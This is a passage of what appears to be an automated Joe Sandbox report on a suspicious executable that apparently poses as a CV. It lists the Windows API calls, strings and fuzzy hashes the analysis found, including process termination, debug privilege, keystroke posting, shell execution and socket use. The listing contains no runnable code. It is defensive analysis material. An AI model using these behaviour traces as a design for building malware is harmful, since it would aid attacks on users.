                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 1268354404-0
                                                                                            APIs
                                                                                              • Part of subcall function 00106EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00105FA6,?), ref: 00106ED8
                                                                                              • Part of subcall function 00106EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00105FA6,?), ref: 00106EF1
                                                                                              • Part of subcall function 001072CB: GetFileAttributesW.KERNEL32(?,00106019), ref: 001072CC
                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 001075CA
                                                                                            • _wcscmp.LIBCMT ref: 001075E2
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 001075FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 793581249-0
                                                                                            APIs
                                                                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0013DAD1,00000004,00000000,00000000), ref: 000DEAEB
                                                                                            • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0013DAD1,00000004,00000000,00000000), ref: 000DEB32
                                                                                            • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0013DAD1,00000004,00000000,00000000), ref: 0013DC86
                                                                                            • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0013DAD1,00000004,00000000,00000000), ref: 0013DCF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1268545403-0
                                                                                            APIs
                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,000FAEF1,00000B00,?,?), ref: 000FB26C
                                                                                            • HeapAlloc.KERNEL32(00000000,?,000FAEF1,00000B00,?,?), ref: 000FB273
                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000FAEF1,00000B00,?,?), ref: 000FB288
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,000FAEF1,00000B00,?,?), ref: 000FB290
                                                                                            • DuplicateHandle.KERNEL32(00000000,?,000FAEF1,00000B00,?,?), ref: 000FB293
                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,000FAEF1,00000B00,?,?), ref: 000FB2A3
                                                                                            • GetCurrentProcess.KERNEL32(000FAEF1,00000000,?,000FAEF1,00000B00,?,?), ref: 000FB2AB
                                                                                            • DuplicateHandle.KERNEL32(00000000,?,000FAEF1,00000B00,?,?), ref: 000FB2AE
                                                                                            • CreateThread.KERNEL32(00000000,00000000,000FB2D4,00000000,00000000,00000000), ref: 000FB2C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                            • String ID:
                                                                                            • API String ID: 1957940570-0
                                                                                            • Opcode ID: 9acf0dc25bd3ad141eaa8d6854d60024bd645fe05a55d93554a0be85fe373601
                                                                                            • Instruction ID: 636998467561e9ea2701d052ad35fb4641c4580a627e9875a27e893af6131343
                                                                                            • Opcode Fuzzy Hash: 9acf0dc25bd3ad141eaa8d6854d60024bd645fe05a55d93554a0be85fe373601
                                                                                            • Instruction Fuzzy Hash: F701C2B5240304BFEB10AFA5EC4DF6B7BACEB89B11F014411FA05DB6A1CA749850CB61
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                            • API String ID: 0-572801152
                                                                                            • Opcode ID: 21f05a2645600ad8fd6745acbd323c7db6c3c6b212b2512a8692e4e082c97b26
                                                                                            • Instruction ID: c4fc2272c8b86c97db7708df2c306b30869e0fdae01d876c7c5ecfa89faf526d
                                                                                            • Opcode Fuzzy Hash: 21f05a2645600ad8fd6745acbd323c7db6c3c6b212b2512a8692e4e082c97b26
                                                                                            • Instruction Fuzzy Hash: DCE19271A40219ABDF18DFA8D881BEEB7B5EB58354F148039F905AB281D770AD81CB90
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearInit$_memset
                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                            • API String ID: 2862541840-625585964
                                                                                            • Opcode ID: 39052ffe58db4fd2240fdc9455cae225892c0554a7d3b910567d9ddfba437e70
                                                                                            • Instruction ID: a480b1d48507a9d407f493908ae39e0d2b5efbb0ee6e4f774ffb023b8002f956
                                                                                            • Opcode Fuzzy Hash: 39052ffe58db4fd2240fdc9455cae225892c0554a7d3b910567d9ddfba437e70
                                                                                            • Instruction Fuzzy Hash: 2491A271A08219EBDF28CFA5D884FEEB7B8EF45714F108169F515AB291D7709980CFA0
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _memset
                                                                                            • String ID: Q\E$[$\$\$]$^
                                                                                            • API String ID: 2102423945-1026548749
                                                                                            • Opcode ID: bb625bfb1d2ab3d78676e0908017fa68e25911fe41e31edb887c3086064d21db
                                                                                            • Instruction ID: f999e7bcf4b4d477334654436a071fc516c80f80a7ed94159c2c3890602a4920
                                                                                            • Opcode Fuzzy Hash: bb625bfb1d2ab3d78676e0908017fa68e25911fe41e31edb887c3086064d21db
                                                                                            • Instruction Fuzzy Hash: F2515E71D002199BCF64CF99C881BEDB7B2BF98314F28816ED818B7351E7309D858B95
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00129B19
                                                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 00129B2D
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00129B47
                                                                                            • _wcscat.LIBCMT ref: 00129BA2
                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00129BB9
                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00129BE7
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window_wcscat
                                                                                            • String ID: SysListView32
                                                                                            • API String ID: 307300125-78025650
                                                                                            • Opcode ID: 94833d9aeac422bb772adae4aa15d7abfc6c83bbcb5be7e37a23e135dea0d7e0
                                                                                            • Instruction ID: f6df36278c7416b36bffdcc5bf1682c5deed785bc096aef7caf357904e599af2
                                                                                            • Opcode Fuzzy Hash: 94833d9aeac422bb772adae4aa15d7abfc6c83bbcb5be7e37a23e135dea0d7e0
                                                                                            • Instruction Fuzzy Hash: 71419175A00358AFDF219FA8EC85FEE77A8EF08350F10442AF549A7291D7719D94CB60
                                                                                            APIs
                                                                                              • Part of subcall function 00106532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00106554
                                                                                              • Part of subcall function 00106532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00106564
                                                                                              • Part of subcall function 00106532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 001065F9
                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0012179A
                                                                                            • GetLastError.KERNEL32 ref: 001217AD
                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001217D9
                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00121855
                                                                                            • GetLastError.KERNEL32(00000000), ref: 00121860
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00121895
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                            • String ID: SeDebugPrivilege
                                                                                            • API String ID: 2533919879-2896544425
                                                                                            • Opcode ID: b1eaf5bdc387312b49fc00180cf58f44295736e6f8f2bac17afad328f54ac9fb
                                                                                            • Instruction ID: 641879a84525e071b3776661f476689da666cf3dc6da91dcc6316a152ece11a8
                                                                                            • Opcode Fuzzy Hash: b1eaf5bdc387312b49fc00180cf58f44295736e6f8f2bac17afad328f54ac9fb
                                                                                            • Instruction Fuzzy Hash: B041BB71600211AFDB05EF54D8E5FAEB7A1BF64700F058059F9069F3D2DBB5AA408F91
                                                                                            APIs
                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 001058B8
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: IconLoad
                                                                                            • String ID: blank$info$question$stop$warning
                                                                                            • API String ID: 2457776203-404129466
                                                                                            • Opcode ID: e0b0a82ff692a0227020e963e4f3e02eca3d57538a9e7fbfdf41dcfb92d30d6e
                                                                                            • Instruction ID: 84a4ed5447ae8075104ccdf855a223a510e44261a5daad657c2e8828b04b9244
                                                                                            • Opcode Fuzzy Hash: e0b0a82ff692a0227020e963e4f3e02eca3d57538a9e7fbfdf41dcfb92d30d6e
                                                                                            • Instruction Fuzzy Hash: CC112735709746BEE7046A569C82DAB33ADDF15324B20803BF994A66C2F7E0AA404A64
                                                                                            APIs
                                                                                            • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0010A806
                                                                                            Similarity
                                                                                            • API ID: ArraySafeVartype
                                                                                            • String ID:
                                                                                            • API String ID: 1725837607-0
                                                                                            • Opcode ID: c0eb764764327cf700e59e8adf1da0ab0e8ef8075178bbd8c7cff16d8e990fa3
                                                                                            • Instruction ID: afe21cb26671ece5f38becf4aed5f7ee8e8c12110f322da92b632e0c41b9a79b
                                                                                            • Opcode Fuzzy Hash: c0eb764764327cf700e59e8adf1da0ab0e8ef8075178bbd8c7cff16d8e990fa3
                                                                                            • Instruction Fuzzy Hash: 94C19D75A0030ADFDB04CF94D481BAEB7F4FF08315F24846AE686E7291D7B4A941CB91
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00106B63
                                                                                            • LoadStringW.USER32(00000000), ref: 00106B6A
                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00106B80
                                                                                            • LoadStringW.USER32(00000000), ref: 00106B87
                                                                                            • _wprintf.LIBCMT ref: 00106BAD
                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00106BCB
                                                                                            Strings
                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00106BA8
                                                                                            Similarity
                                                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                            • API String ID: 3648134473-3128320259
                                                                                            • Opcode ID: 44d040ee2d0f826054398daea3b64578fc48fe6caf83a2a795ac6b711275d6da
                                                                                            • Instruction ID: a711c0a4aad7ccd5b254df5c10eafcf2b1d559945ad34cdf602932c481468dbe
                                                                                            • Opcode Fuzzy Hash: 44d040ee2d0f826054398daea3b64578fc48fe6caf83a2a795ac6b711275d6da
                                                                                            • Instruction Fuzzy Hash: 0F0186F6500208BFEB11A794AD89EFB337CD704305F004491B745E6551EA749EC48F71
                                                                                            APIs
                                                                                              • Part of subcall function 00123C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00122BB5,?,?), ref: 00123C1D
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00122BF6
                                                                                            Similarity
                                                                                            • API ID: BuffCharConnectRegistryUpper
                                                                                            • String ID:
                                                                                            • API String ID: 2595220575-0
                                                                                            • Opcode ID: ce264b3de1f2664caad4f8e9170b33982d1aea8667f053367b1a10033ea53a9f
                                                                                            • Instruction ID: 726ff71685a7b2e807d989eb58ecc6ce7454480258068670088d02e30450f469
                                                                                            • Opcode Fuzzy Hash: ce264b3de1f2664caad4f8e9170b33982d1aea8667f053367b1a10033ea53a9f
                                                                                            • Instruction Fuzzy Hash: D3916675204211AFCB14EF94D881FAEB7E5BF98310F04881DF996972A2DB34ED55CB82
                                                                                            APIs
                                                                                            • select.WSOCK32 ref: 00119691
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0011969E
                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?), ref: 001196C8
                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001196E9
                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 001196F8
                                                                                            • htons.WSOCK32(?), ref: 001197AA
                                                                                            • inet_ntoa.WSOCK32(?), ref: 00119765
                                                                                              • Part of subcall function 000FD2FF: _strlen.LIBCMT ref: 000FD309
                                                                                            • _strlen.LIBCMT ref: 00119800
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                            • String ID:
                                                                                            • API String ID: 3480843537-0
                                                                                            • Opcode ID: f2e62a67102ccd6209410e5015a8166b9e5c8c69c6939beec4bb4708fabcbfa5
                                                                                            • Instruction ID: 117455f809a955dff6d12cee61dd3c9a8811004f5e488d3e95951d5633bf3296
                                                                                            • Opcode Fuzzy Hash: f2e62a67102ccd6209410e5015a8166b9e5c8c69c6939beec4bb4708fabcbfa5
                                                                                            • Instruction Fuzzy Hash: BD81E031504200ABD718EF64DC95FAFB7A8EF85714F10462EF5659B2A2EB30DD44CBA2
                                                                                            APIs
                                                                                            • __mtinitlocknum.LIBCMT ref: 000EA991
                                                                                              • Part of subcall function 000E7D7C: __FF_MSGBANNER.LIBCMT ref: 000E7D91
                                                                                              • Part of subcall function 000E7D7C: __NMSG_WRITE.LIBCMT ref: 000E7D98
                                                                                              • Part of subcall function 000E7D7C: __malloc_crt.LIBCMT ref: 000E7DB8
                                                                                            • __lock.LIBCMT ref: 000EA9A4
                                                                                            • __lock.LIBCMT ref: 000EA9F0
                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00176DE0,00000018,000F5E7B,?,00000000,00000109), ref: 000EAA0C
                                                                                            • EnterCriticalSection.KERNEL32(8000000C,00176DE0,00000018,000F5E7B,?,00000000,00000109), ref: 000EAA29
                                                                                            • LeaveCriticalSection.KERNEL32(8000000C), ref: 000EAA39
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                            • String ID:
                                                                                            • API String ID: 1422805418-0
                                                                                            • Opcode ID: 07cce34a1c346baf3d2ec875401a04385b93aa2e46420b7a5f5dea2b221cd410
                                                                                            • Instruction ID: 133a28eba73e42d4102cadb6aa3aa4db5c481c1c0a48910bacf63d6696b50758
                                                                                            • Opcode Fuzzy Hash: 07cce34a1c346baf3d2ec875401a04385b93aa2e46420b7a5f5dea2b221cd410
                                                                                            • Instruction Fuzzy Hash: D2414D71F007859FDB649F6AD94479CB7F06F0A334F154228E429BB2D2D774A944CB82
                                                                                            APIs
                                                                                            • DeleteObject.GDI32(00000000), ref: 00128EE4
                                                                                            • GetDC.USER32(00000000), ref: 00128EEC
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00128EF7
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00128F03
                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00128F3F
                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00128F50
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0012BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00128F8A
                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00128FAA
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3864802216-0
                                                                                            • Opcode ID: 0db99c356f8b3ccac7ddc107c0a7106a54bcba5153f20e76e32d290856786669
                                                                                            • Instruction ID: ec4c0bb984563430e54bc9855b062d6607b94f6fae6e23008e538b61352e1fea
                                                                                            • Opcode Fuzzy Hash: 0db99c356f8b3ccac7ddc107c0a7106a54bcba5153f20e76e32d290856786669
                                                                                            • Instruction Fuzzy Hash: 84318D76201224BFEF108F50EC49FEA3BA9EF4A715F054065FE089A1A1D7759851CB70
                                                                                            APIs
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                              • Part of subcall function 000DC6F4: _wcscpy.LIBCMT ref: 000DC717
                                                                                            • _wcstok.LIBCMT ref: 0011184E
                                                                                            • _wcscpy.LIBCMT ref: 001118DD
                                                                                            • _memset.LIBCMT ref: 00111910
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                            • String ID: X
                                                                                            • API String ID: 774024439-3081909835
                                                                                            • Opcode ID: 7db25e533e1991edb5e2c8b49c556f6dd3cf9a9fcd7cad680c031f4e62525613
                                                                                            • Instruction ID: aa389b62b5ff88b9332606eb1f2b3f16442156f0b8c1bd40d9630649b56f6de4
                                                                                            • Opcode Fuzzy Hash: 7db25e533e1991edb5e2c8b49c556f6dd3cf9a9fcd7cad680c031f4e62525613
                                                                                            • Instruction Fuzzy Hash: D3C16C35508340AFC728EF64C891E9EB7E4BF95350F04492DF999972A2DB30ED45CB82
                                                                                            APIs
                                                                                              • Part of subcall function 000DB34E: GetWindowLongW.USER32(?,000000EB), ref: 000DB35F
                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 0013016D
                                                                                            • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0013038D
                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 001303AB
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?), ref: 001303D6
                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 001303FF
                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00130421
                                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00130440
                                                                                            Similarity
                                                                                            • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                            • String ID:
                                                                                            • API String ID: 3356174886-0
                                                                                            • Opcode ID: 89952709f1670ba81083131c484ad92767fb68c4c28b1fdbb04f8233473f6952
                                                                                            • Instruction ID: f9ce53d8005a498b2298f946bb1f224a8bcbb6d341c42f67050b5e3f18177f24
                                                                                            • Opcode Fuzzy Hash: 89952709f1670ba81083131c484ad92767fb68c4c28b1fdbb04f8233473f6952
                                                                                            • Instruction Fuzzy Hash: 07A1AE35600616EFDB19CF68C9957BEBBF1BF08740F158115EC58AB290D774ADA0CB90
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 604644902da2ba3c62cdd01b26184f9a87e74c2b2c116305bcac13a34a00dce1
                                                                                            • Instruction ID: 2f0b1cddb8b3d702e2ab0a34505a5f625fcf5544e1c1dbea450a40c3e9102b62
                                                                                            • Opcode Fuzzy Hash: 604644902da2ba3c62cdd01b26184f9a87e74c2b2c116305bcac13a34a00dce1
                                                                                            • Instruction Fuzzy Hash: BF713CB1A00209EFCB14CF98CC49AAEBBB5FF86314F14819AF915A7351C7349A51CF65
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 0012225A
                                                                                            • _memset.LIBCMT ref: 00122323
                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00122368
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                              • Part of subcall function 000DC6F4: _wcscpy.LIBCMT ref: 000DC717
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0012242F
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0012243E
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                            • String ID: @
                                                                                            • API String ID: 4082843840-2766056989
                                                                                            • Opcode ID: 93e358ef945be3a079464c97413b7cc0da211d857f147cd5a903308c08ffb502
                                                                                            • Instruction ID: 34d5662969d9b1144bf69b69386f9a0591e0ef3385f37eac7c3e9e38db050ce8
                                                                                            • Opcode Fuzzy Hash: 93e358ef945be3a079464c97413b7cc0da211d857f147cd5a903308c08ffb502
                                                                                            • Instruction Fuzzy Hash: DC716F74A00629EFCF05EFA4D885AAEB7F5FF48310F108459E855AB352DB34AE50CB94
                                                                                            APIs
                                                                                            • GetParent.USER32(00000000), ref: 00103C02
                                                                                            • GetKeyboardState.USER32(?), ref: 00103C17
                                                                                            • SetKeyboardState.USER32(?), ref: 00103C78
                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00103CA4
                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00103CC1
                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00103D05
                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00103D26
                                                                                            Similarity
                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                            • String ID:
                                                                                            • API String ID: 87235514-0
                                                                                            • Opcode ID: 5badb3900a38cd9ae4e70e1893afd39be032011404379fd37d092bf0a244f9b6
                                                                                            • Instruction ID: b62c4b151285444a8661cdbd74dbe72f1b03290f4e386acb08d0e855419e5874
                                                                                            • Opcode Fuzzy Hash: 5badb3900a38cd9ae4e70e1893afd39be032011404379fd37d092bf0a244f9b6
                                                                                            • Instruction Fuzzy Hash: 4E5105B05447D53DFB3283748C45BB6BFAD6B06304F088489E1E99A8D2D7D5EE84E760
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00128FE7
                                                                                            • GetWindowLongW.USER32(0192DE60,000000F0), ref: 0012901A
                                                                                            • GetWindowLongW.USER32(0192DE60,000000F0), ref: 0012904F
                                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00129081
                                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001290AB
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 001290BC
                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001290D6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 2178440468-0
                                                                                            • Opcode ID: 64e3e49ba9dd9bd359df9b4cf4de7dcf931c342ad28f1a1ccd9295f6efaf86e0
                                                                                            • Instruction ID: e6e9d36c44c6204144e84035d169d5e0df5af3c40be0a01b5479a50623f0238f
                                                                                            • Opcode Fuzzy Hash: 64e3e49ba9dd9bd359df9b4cf4de7dcf931c342ad28f1a1ccd9295f6efaf86e0
                                                                                            • Instruction Fuzzy Hash: 9B315B35600228EFDB20CF58EC84F5437A9FB4A314F2501A4F6198F6B1CBB1A891CB44
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001008F2
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00100918
                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0010091B
                                                                                            • SysAllocString.OLEAUT32(?), ref: 00100939
                                                                                            • SysFreeString.OLEAUT32(?), ref: 00100942
                                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 00100967
                                                                                            • SysAllocString.OLEAUT32(?), ref: 00100975
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                            • String ID:
                                                                                            • API String ID: 3761583154-0
                                                                                            • Opcode ID: 827aa80e1f31bfb680c24569d658ba58d803bd22bb86a77adcf974107a1e8db9
                                                                                            • Instruction ID: 52f294c8a4103b028c3bd087395f4a8c9ee92ba4579285dabef8ea89eb5ae257
                                                                                            • Opcode Fuzzy Hash: 827aa80e1f31bfb680c24569d658ba58d803bd22bb86a77adcf974107a1e8db9
                                                                                            • Instruction Fuzzy Hash: 23219476601209AFDF119F68DC84EBB73ACFB09364B048126F949DB2A1D7B0EC418760
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wcsnicmp
